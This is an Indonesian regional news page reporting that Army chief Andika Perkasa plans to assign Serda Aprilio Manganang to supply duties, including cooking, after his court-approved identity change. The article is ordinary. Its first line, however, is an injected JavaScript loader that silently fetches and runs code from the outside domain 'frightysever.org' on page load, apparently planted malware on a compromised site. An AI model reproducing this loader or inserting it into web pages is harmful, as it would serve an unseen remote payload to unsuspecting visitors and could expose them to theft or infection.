(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
NASIONAL

Sah jadi Pria, Aprilo Manganang Kini Ditugaskan Bikin Masakan di TNI AD


KANALKALIMANTAN.COM – Kepala Staf Angkatan Darat (KSAD) Jenderal Andika Perkasa mengatakan bakal menempatkan Serda Aprilio Perkasa Manganang di bagian Perbekalan dan Angkutan TNI.

“Saya akan berpikir lebih pas bagi Aprilio untuk saya tempatkan di perbekalan dan angkutan. Di seksi perbekalan itu tugasnya antara lain menyiapkan makanan atau memasak,” ujar Andika kepada wartawan di Markas Besar TNI Angkatan Darat Jakarta Pusat, Jumat (19/3/2021).

Hal itu menurut Andika cocok bagi Aprilio karena kemampuan memasaknya yang baik.

Baca Juga:
Golkar Kalsel Tetap Optimis Hadapi Pemungutan Suara Ulang yang Diputus MK 

“Itu ya bukan tugas perempuan saja. Banyak prajurit TNI ada pria yang bertugas disitu. Kebetulan, Aprilio ini sejak kecil oleh mamanya dididik untuk masak. Sehingga masaknya ini jago dan itu natural,” ujarnya.

Terkait kondisi psikologis, Andika mengatakan bakal mendampinginya. Sebab secara psikis tidak mudah bagi Aprilio untuk beradaptasi dengan identitas barunya.

“Sedangkan secara psikis saya yakin tidak akan terlalu gampang. Oh tadi pagi perempuan terus sudah menjadi laki-lakinya kayakanya enggaklah. Saya perlu mengawal dia supaya secara psikis transisi ni smooth,” ujarnya.

Sementara itu, Aprilio berharap agar proses perubahan dirinya ini menjadi inspirasi bagi orang-orang yang mengalami hipospadia seperti dirinya.

“Mungkin pesanya untuk orang yang seperti saya tidak usah takut kita harus berani saja, agar kita tahu kondisi kita dan kita harus jujur,” ujarnya.

Baca Juga:
BREAKING NEWS. MK Perintahkan KPU Kalsel Gelar Pemilihan Ulang Paling Lambat 60 Hari

Karenanya agar cerita perubahannya itu bisa didengar orang banyak, Aprilio berharap bisa menjadi seorang pembicara.

“Saya juga sempat berpikir, saya juga ingin menjadi pembicara. Orang- orang seperti saya, itu penting banget, karena juga mereka manusia yang berhak untuk bahagia,” katanya.

Diketahui, Majelis Hakim di Pengadilan Negeri (PN) Tondano, Minahasa, Sulawesi Utara telah mengabulkan pengajuan pergantian identitas yang diajukan oleh Serda Aprilia Manganang, hari ini. Setelah permohonannya dikabulkan, Aprilia resmi mengubah identitasnya dan berganti nama menjadi Aprilio Perkasa Manganang. (suara.com)


Al Ghifari

Recent Posts

Wagub Edy Pratowo Maju Pilkada Kalteng, Siap Dipasang Posisi Apapun

KANALKALIMANTAN.COM, PALANGKARAYA - Wakil Gubernur (Wagub) Kalimantan Tengah (Kalteng), Edy Pratowo, mengumumkan keputusannya untuk mendaftarkan… Read More

7 menit ago

Target Juara Umum Popda Kalsel 2024, Aditya Janji Beri Bonus Pribadi

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin melepas 109 atlet untuk berlaga dalam… Read More

39 menit ago

Ancaman Banjir Rob di Pesisir Kalsel saat Fase Bulan Baru

KANALKALIMANTAN.COM, BANJARMASIN - Stasiun Meteorologi (Statmet) Syamsudin Noor Banjarmasin mengeluarkan imbauan mengenai potensi banjir pesisir… Read More

48 menit ago

PKS Banjarbaru Buka Penjaringan, Siap Koalisi Tawarkan Kader Sendiri

KANALKALIMANTAN.COM, BANJARBARU - Dewan Pimpinan Darah Partai Keadilan Sejahtera (PKS) Kota Banjarbaru membuka pendaftaran bakal… Read More

3 jam ago

Hidup Makin Tenang, Hadapi Risiko dengan Asuransi Pelita dari BRI Life

KANALKALIMANTAN.COM, - Asuransi merupakan salah satu bentuk perlindungan yang perlu dimiliki setiap orang. Dengan memiliki… Read More

17 jam ago

10 Mei Hari Lupus Sedunia, Yuk Kenali Penyakit Lupus

KANALKALIMANTAN.COM - Peringatan Hari Lupus Sedunia ini diadakan pada tanggal 10 Mei setiap tahunnya. Hari… Read More

17 jam ago

This website uses cookies.